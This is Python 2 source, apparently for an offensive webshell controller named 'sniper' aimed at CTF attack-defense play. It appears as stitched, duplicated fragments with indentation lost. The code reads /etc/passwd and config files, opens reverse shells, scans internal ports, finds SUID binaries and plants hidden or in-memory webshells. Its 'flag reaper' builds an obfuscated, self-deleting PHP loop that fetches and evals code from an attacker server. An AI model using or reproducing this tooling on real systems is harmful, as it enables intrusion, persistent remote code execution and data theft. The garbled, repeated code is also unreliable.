def interactive(self):
self.help()
while True:
Log.context("sniper")
Log.context("mysql")
command = string.lower(raw_input("=>") or "h")
if command == "h":
self.help()
elif command == "cd":
self.get_currect_database()
elif command == "u":
self.get_currect_user()
elif command == "v":
self.get_version()
elif command == "d":
self.get_databases()
elif command == "t":
self.get_databases()
database = self.database
if database == "":
database = raw_input("Input database name : ")
if database == "":
Log.error(
"No database selected! Please input : [cd] command!")
self.get_table_from_database(database)
elif command == "c":
self.get_databases()
database = self.database
if database == "":
database = raw_input("Input database name : ")
if database == "":
Log.error(
"No database selected! Please input : [cd] command!")
continue
self.get_table_from_database(database)
table = raw_input("Input table name : ")
if table == "":
Log.error("No tablename inputed!")
continue
self.get_columns_from_table(table, database)
elif command == "e":
sql = raw_input("Input your sql : ") or "select @@version;"
Log.info("Executing sql : [%s]" % (sql))
self.sql_exec(sql)
elif command == "q":
Log.info("Quiting...")
break
else:
Log.error("Unsupported command!")
self.help()
def interactive(self):
Log.info("Starting interactive shell...")
while True:
Log.context("sniper")
Log.context("shell")
command = raw_input("$ ")
if string.lower(command) == "exit":
Log.info("Exiting shell...")
break
result = self.webshell.auto_exec(command)
if result[0]:
Log._print(result[1])
else:
Log.error(result[1])
def main():
banner()
if len(sys.argv) != 4:
show_help()
exit(1)
url = sys.argv[1]
method = sys.argv[2]
password = sys.argv[3]
webshell = WebShell(url, method, password)
LOCAL_COMMAND_FLAG = True
if not webshell.working:
Log.error("The webshell cannot work...")
exit(2)
main_help()
while True:
Log.context("sniper")
context_fresh = raw_input("=>") or "h"
context = string.lower(context_fresh)
if context == "h" or context == "help" or context == "?":
main_help()
elif context == "sh" or context == "shell":
shell = Shell(webshell)
shell.interactive()
elif context == "rsh" or context == "rshell":
Log.info("socat file:`tty`,raw,echo=0 tcp-l:8888")
ip = raw_input("[IP] : (%s)" %
(get_ip_address())) or get_ip_address()
port = raw_input("[PORT] : (8888)") or "8888"
Log.info("Starting reverse shell (%s:%s)" % (ip, port))
webshell.reverse_shell(ip, port)
elif context == "p" or context == "print":
webshell.print_info()
elif context == "pv" or context == "php_version":
webshell.get_php_version()
elif context == "kv" or context == "kernel_version":
webshell.get_kernel_version()
elif context == "c" or context == "config":
Log.info("Detacting config files...")
webshell.get_config_file()
elif context == "fwd":
webshell.get_writable_directory()
elif context == "gdf":
webshell.get_disabled_functions()
elif context == "fwpf":
webshell.get_writable_php_file()
elif context == "fsb":
webshell.get_suid_binaries()
elif context == "setr":
LOCAL_COMMAND_FLAG = False
elif context == "setl":
LOCAL_COMMAND_FLAG = True
elif context == "dla":
path = raw_input(
"Input path (%s) : " % webshell.webroot) or (webshell.webroot)
args = raw_input("Please custom find args (%s) : " %
(" -size 500k")) or " -size 500k"
Log.info("Using command : find %s %s" % (path, args))
webshell.download_advanced(path, args)
elif context == "dl":
path = raw_input(
"Input path (%s) : " % webshell.webroot) or (webshell.webroot)
if not webshell.file_exists(path):
Log.error("The file [%s] is not exists on the server!" %
(path))
continue
if webshell.is_directory(path):
Log.info(
"The target file is a directory, using recursion download..."
)
filename_filter = raw_input("Input --name '%s' : " %
("*.php")) or "*.php"
webshell.download_recursion(path, filename_filter)
else:
#filename = path.split("/")[-1]
#local_path = raw_input("Input local path (%s) to save the file : " % filename) or (filename)
# Log.info("Using root path : [%s] to save!" % (local_path))
Log.info(
"The target file is a single file, starting download...")
webshell.download(path, path)
elif context == "ps":
hosts = raw_input(
"Input hosts (192.168.1.1/24) : ") or "192.168.1.1/24"
if not "/" in hosts:
Log.error(
"Please use the format IP/MASK , if want to scan a single host , set MASK=32"
)
continue
ports = raw_input("Input ports (21,22,25,80,443,445,3389)"
) or "21,22,25,80,443,445,3389"
webshell.port_scan(hosts, ports)
elif context == "aiw":
default = random_string(0x10, string.letters)
filename = raw_input("Filename (.%s.php): " %
(default)) or (".%s.php" % (default))
password = raw_input("Password (%s): " % (default)) or ("%s" %
(default))
webshell.auto_inject_webshell(filename, password)
elif context == "r" or context == "read":
filepath = raw_input(
"Input file path (/etc/passwd) : ") or "/etc/passwd"
webshell.read_file(filepath)
elif context == "db" or context == "database":
ip = raw_input("IP (127.0.0.1): ") or "127.0.0.1"
username = raw_input("Username (root): ") or "root"
password = raw_input("Password (root): ") or "root"
Log.info("Creating connection by [%s:%s] to [%s]..." %
(username, password, ip))
mysql_connection = Mysql(webshell, ip, username, password)
if not mysql_connection.function:
Log.error("The target server cannot support mysql!")
continue
if not mysql_connection.connection_flag:
Log.error("Connection failed!")
continue
Log.success("Connection success!")
if mysql_connection.function != "":
Log.success("Entering database server interactive mode...")
mysql_connection.interactive()
else:
Log.error("No supported database function!")
elif context == "q" or context == "quit" or context == "exit":
Log.info("Quiting...")
break
else:
Log.error("Unsupported function!")
if LOCAL_COMMAND_FLAG == True:
Log.info("Executing command on localhost...")
os.system(context_fresh)
else:
Log.info("Executing command on target server...")
webshell.auto_exec_print(context_fresh)
def main():
banner()
if len(sys.argv) != 4:
show_help()
exit(1)
url = sys.argv[1]
method = sys.argv[2]
password = sys.argv[3]
webshell = WebShell(url, method, password)
LOCAL_COMMAND_FLAG = True
if not webshell.working:
Log.error("The webshell cannot work...")
exit(2)
Log.info("recording this webshell to the log file...")
with open("Webshell.txt", "a+") as f:
log_content = "%s => %s => %s\n" % (url, method, password)
f.write(log_content)
main_help()
while True:
Log.context("sniper")
context_fresh = raw_input("=>") or "h"
context = string.lower(context_fresh)
if context == "h" or context == "help" or context == "?":
main_help()
elif context == "sh" or context == "shell":
shell = Shell(webshell)
shell.interactive()
elif context == "rsh" or context == "rshell":
Log.info("socat file:`tty`,raw,echo=0 tcp-l:8888")
ip = raw_input("[IP] : (%s)" %
(get_ip_address())) or get_ip_address()
port = raw_input("[PORT] : (8888)") or "8888"
Log.info("Starting reverse shell (%s:%s)" % (ip, port))
webshell.reverse_shell(ip, port)
elif context == "p" or context == "print":
webshell.print_info()
elif context == "pv" or context == "php_version":
Log.success(webshell.get_php_version())
elif context == "kv" or context == "kernel_version":
Log.success(webshell.get_kernel_version())
elif context == "c" or context == "config":
Log.info("Detacting config files...")
webshell.get_config_file()
elif context == "fwd":
webshell.get_writable_directory()
elif context == "gdf":
webshell.get_disabled_functions()
elif context == "fwpf":
webshell.get_writable_php_file()
elif context == "fsb":
webshell.get_suid_binaries()
elif context == "setr":
LOCAL_COMMAND_FLAG = False
elif context == "setl":
LOCAL_COMMAND_FLAG = True
elif context == "dla":
path = raw_input(
"Input path (%s) : " % webshell.webroot) or (webshell.webroot)
args = raw_input("Please custom find args (%s) : " %
(" -size 500k")) or " -size 500k"
Log.info("Using command : find %s %s" % (path, args))
webshell.download_advanced(path, args)
elif context == "dl":
path = raw_input(
"Input path (%s) : " % webshell.webroot) or (webshell.webroot)
if not webshell.file_exists(path):
Log.error("The file [%s] is not exists on the server!" %
(path))
continue
if webshell.is_directory(path):
Log.info(
"The target file is a directory, using recursion download..."
)
filename_filter = raw_input("Input --name '%s' : " %
("*.php")) or "*.php"
webshell.download_recursion(path, filename_filter)
else:
#filename = path.split("/")[-1]
#local_path = raw_input("Input local path (%s) to save the file : " % filename) or (filename)
# Log.info("Using root path : [%s] to save!" % (local_path))
Log.info(
"The target file is a single file, starting download...")
webshell.download(path, path)
elif context == "ps":
hosts = raw_input(
"Input hosts (192.168.1.1/24) : ") or "192.168.1.1/24"
if not "/" in hosts:
Log.error(
"Please use the format IP/MASK , if want to scan a single host , set MASK=32"
)
continue
ports = raw_input("Input ports (21,22,25,80,443,445,3389)"
) or "21,22,25,80,443,445,3389"
webshell.port_scan(hosts, ports)
elif context == "aiw":
default_filename = random_string(0x10, string.letters)
default_password = md5(
md5("%s%s%s" % (salt, default_filename, salt)))
filename = raw_input("Filename (.%s.php): " %
(default_filename)) or (".%s.php" %
(default_filename))
password = raw_input("Password (%s): " %
(default_password)) or ("%s" %
(default_password))
webshell.auto_inject_webshell(filename, password)
elif context == "aimw":
default_filename = random_string(0x10, string.letters)
default_password = md5(
md5("%s%s%s" % (salt, default_filename, salt)))
filename = raw_input("Filename (.%s.php): " %
(default_filename)) or (".%s.php" %
(default_filename))
password = raw_input("Password (%s): " %
(default_password)) or ("%s" %
(default_password))
webshell.auto_inject_memery_webshell(filename, password)
elif context == "fr":
Log.info("Starting flag reaper...")
webserver_host = raw_input("[IP] (%s) : " %
(get_ip_address())) or get_ip_address()
webserver_port = int(raw_input("[PORT] (80) : ") or "80")
filename = ".%s.php" % (random_string(0x10, string.letters))
file_content = "ignore_user_abort(true);set_time_limit(0);unlink(__FILE__);while(true){$code = file_get_contents('http://%s:%d/code.txt');eval($code);sleep(5);}" % (
webserver_host, webserver_port)
Log.info("Temp memory phpfile : %s" % (file_content))
Log.info("Encoding phpfile...")
file_content = '<?php unlink(__FILE__);eval(base64_decode("%s"));?>' % (
file_content.encode("base64").replace("\n", ""))
Log.info("Final memory phpfile : %s" % (file_content))
result = webshell.auto_inject_flag_reaper(filename, file_content)
if result:
Log.success(
"Please check the web server(%s:%d) log to get your flag!"
% (webserver_host, webserver_port))
Log.info("Tips : tail -f /var/log/apache2/access.log")
else:
Log.error("Starting flag reaper failed!")
elif context == "r" or context == "read":
filepath = raw_input(
"Input file path (/etc/passwd) : ") or "/etc/passwd"
webshell.read_file(filepath)
elif context == "db" or context == "database":
ip = raw_input("IP (127.0.0.1): ") or "127.0.0.1"
username = raw_input("Username (root): ") or "root"
password = raw_input("Password (root): ") or "root"
Log.info("Creating connection by [%s:%s] to [%s]..." %
(username, password, ip))
mysql_connection = Mysql(webshell, ip, username, password)
if not mysql_connection.function:
Log.error("The target server cannot support mysql!")
continue
if not mysql_connection.connection_flag:
Log.error("Connection failed!")
continue
Log.success("Connection success!")
if mysql_connection.function != "":
Log.success("Entering database server interactive mode...")
mysql_connection.interactive()
else:
Log.error("No supported database function!")
elif context == "q" or context == "quit" or context == "exit":
Log.info("Quiting...")
break
else:
Log.error("Unsupported function!")
if LOCAL_COMMAND_FLAG == True:
Log.info("Executing command on localhost...")
os.system(context_fresh)
else:
Log.info("Executing command on target server...")
webshell.auto_exec_print(context_fresh)
